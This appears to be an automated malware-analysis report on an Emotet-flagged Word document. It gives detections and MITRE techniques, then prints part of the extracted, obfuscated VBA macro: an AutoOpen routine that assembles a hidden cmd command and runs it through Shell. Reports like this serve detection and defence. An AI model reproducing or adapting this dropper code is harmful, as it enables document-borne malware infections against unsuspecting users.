Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6802950-0'. The presence of an AutoOpen VBA macro indicates an attempt to automatically execute malicious code upon opening the document. The VBA script, although obfuscated, likely attempts to download and execute a second-stage payload, a common characteristic of Emotet droppers.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6802950-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6802950-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36138 bytes |
SHA-256 (macros.bas): 42f9a67e0e0b4589107a8d64283fd44155d09c641880ecea255d594515f30ffa
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "amFAQmi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
RRDjV = supwE
zdIfhH = 560
ELCdwh = CDbl(7939)
imWiSZUu = "" + jvRYMaoDi + UAkEUfiQVMIiq + CVar("cm") + jTOPkwGDhHS + SFmPslP + bUQuDDOS + RjkcPT + EknRr + YiIbKFwva + AGKuBJC + fqwiqi + fPjGcv + JTWRbmMu + LAvwOopqIQ + iIJMfXwwTa + IiFHUTcDob + dwjJGmo + XjMHGtaQ + AnPXP + czaNXkWuokO + TdnFSFjnwt + fEwfkwjzE + uMScbLVJHS + nioRpLuuw + oUzuI + ZAwJRHd + QRozVm + PFizuVCUbA + XRCzhsm + YAwGf + ZwTKMQ + rwmAUNL + PdkGHTjdCrU + XfOfPVuS + iYhhlsbi + MjrdpLttWTz + zRzuQ + iuwmpik + iMmHOwG + nwaUTIpnsB + spHJJ + vKFhwiC + tqNPAMuzBrr + EMhvZcA + NFpRsij + lDiqIdSjU + jiHKqINjAz + HrlwItq + svJrLupG + sfaRhOQGqHL + wPiSNiMcI + bmjtUoTct + CzBibwPatmFWfo
NGzZC = qqKSY
vQrBAq = Int(98)
Shell@ imWiSZUu, 0
BARbh = ChrW(WQEFEk)
End Sub
Attribute VB_Name = "uouvHKXJZi"
Function bUQuDDOS()
On Error Resume Next
XtujJC = zCsTWa
XzqnCr = 3
rirYlTAo = "d" + " "
KJrUQa = FAYNS
VapUcn = " " + " /" + "c " + " " + "FO"
zGXYzS = "R /" + "F " + CStr(Chr(SUlXQMDh + jvpZWkmTYzivj + 34 + rDVmqSiEwa + ShTShfdcHzt)) + "token" + "s=2" + " delims=" + "P=Mf" + CStr(Chr(ZwjVcWosD + huwZzrsw + 34 + TmFfzPCP + JiTRVziTEGjPH)) + " %d I" + "N ("
wHqpMXoK = "'assoc.cmd" + "')" + "DO " + "%d /V:" + " /r"
ptuTIuU = " " + CStr(Chr(mjEiPGuPLFJd + HldqjADafDw + 34 + uVYDfvuKjw + lOPILMVsowUGYa)) + " s" + "et " + " +" + "$="
oAbwZz = Sin(20930 * jcYOW + 3199 / QUEBkB)
otXCC = VCdfY
CBGLdC = Fix(HpMvYr)
iFZVbkLSYT = "//-/-\_/\" + "_-\__\ -/_"
poaEn = EBwINL
EUorfa = FnQFFv
iAVjORf = "-\-/\_-\" + "_\// " + "/_-//\" + "/-\\__-_" + "\ /\-_\" + "-"
zRWZQk = Atn(841)
UUELD = "_/\\_/_/- " + "/--\" + "/\_"
Mthnqz = CSng(ZEzSsj)
KdjGG = 2650
QLlTBRTkmdr = "/-\_\_/_" + " _\_--/\\" + "/-//\__ \"
bUQuDDOS = rirYlTAo + VapUcn + zGXYzS + wHqpMXoK + ptuTIuU + iFZVbkLSYT + iAVjORf + UUELD + QLlTBRTkmdr
jcvEu = DwuzM
KDTnj = ChrB(878)
End Function
Function RjkcPT()
On Error Resume Next
HszmwV = 46
EUZEEAXZHBT = "___/\//\_" + "-\--/ --_/"
utlOA = YtWRw
JCvUY = Log(nJNpi)
iKzDMifCavj = "\/-_\" + "_\/" + "_\- \_-\\_"
wkdqsTHR = "\/-" + "_-/-/_ _" + "-\_\-" + "_//_\/" + "/\- _/-_-" + "/\\_-"
TMMVpq = "\/\_- \_-_" + "\-/\_\" + "//--/ _" + "_" + "__\-/" + "/" + "\\/\--"
GpzLju = Round(wGAhUO)
mlwCVr = Haonf
TBmBu = HmBwq
zEUjCbRBti = "- \/\--_" + "_/-_/\/-" + "_ -_" + "-/\-" + "/_/-\\__\" + " _\_-" + "-\/_//"
mYVGRD = Rnd(GNWHM)
vdXYcdE = "-\-_/" + " /" + "\\-"
WvOrp = 5989
jfZjz = AnJDm
CrsRShk = "/\\_/--/-" + "__ --/-" + "\" + "-_\" + "__/" + "/_\\}"
uirQuoRCF = "\_-_///-__"
HGYJa = Log(kLCfUw)
IQXzn = 98
zIbYP = lfNiHG
wDQjzROS = "-\/\-}-\/" + "/_-_/\-/" + "\\-_{\/_//" + "_-\_\"
RjkcPT = EUZEEAXZHBT + iKzDMifCavj + wkdqsTHR + TMMVpq + zEUjCbRBti + vdXYcdE + CrsRShk + uirQuoRCF + wDQjzROS
zHjlP = CLng(813)
End Function
Function EknRr()
On Error Resume Next
JaijVRl = "-" + "-\_/h"
ibDNo = 5060
MCjpBbvpAi = "/\_-"
obZoFw = 141
UdptDwCiHD = "-\-//" + "_-_\/_c/--" + "/__-/\\\-_" + "/\t/_/-" + "_-"
OiAsvW = 307123685
TXzHJT = ChrB(ckJQZo)
tMhwzqnZGB = "\" + "_\/_\--/a/" + "_-\\/_" + "--\/" + "-\/_c\-" + "/"
qwUIPkqkNG = "\_" + "_-///" + "__\\-}" + "_"
EknRr = JaijVRl + MCjpBbvpAi + UdptDwCiHD + tMhwzqnZGB + qwUIPkqkNG
VIclD = CGzEwZ
rJLVrR = CDbl(DTrvj)
End Function
Function YiIbKFwva()
On Error Resume Next
UXpYA = CByte(AHEkT)
CktfQ = "_" + "/\_\-_\/" + "\--//" + ";\" + "\--_/"
XAkqp = CdDJOR
zbsPN = ChrB(59579 * TlaAuk - GZSqE / wUFLwA)
wRHFJwn = "/-_-_\/" + "/_k/-\_-\"
RMJivk = 2
EkHdV = CSng(16838 / nRwipo + 86246 * fAsiH)
PXGfpA = RdDUIc
fFBaP = "___/--//"
AaOBv = 7
ZIWsBH = 19
BCcVYIN = "\a-" + "_--///\" + "-\" + "\/__\e\" + "-\"
sYsiiC = iWisi
JBQDL = CBool
... (truncated)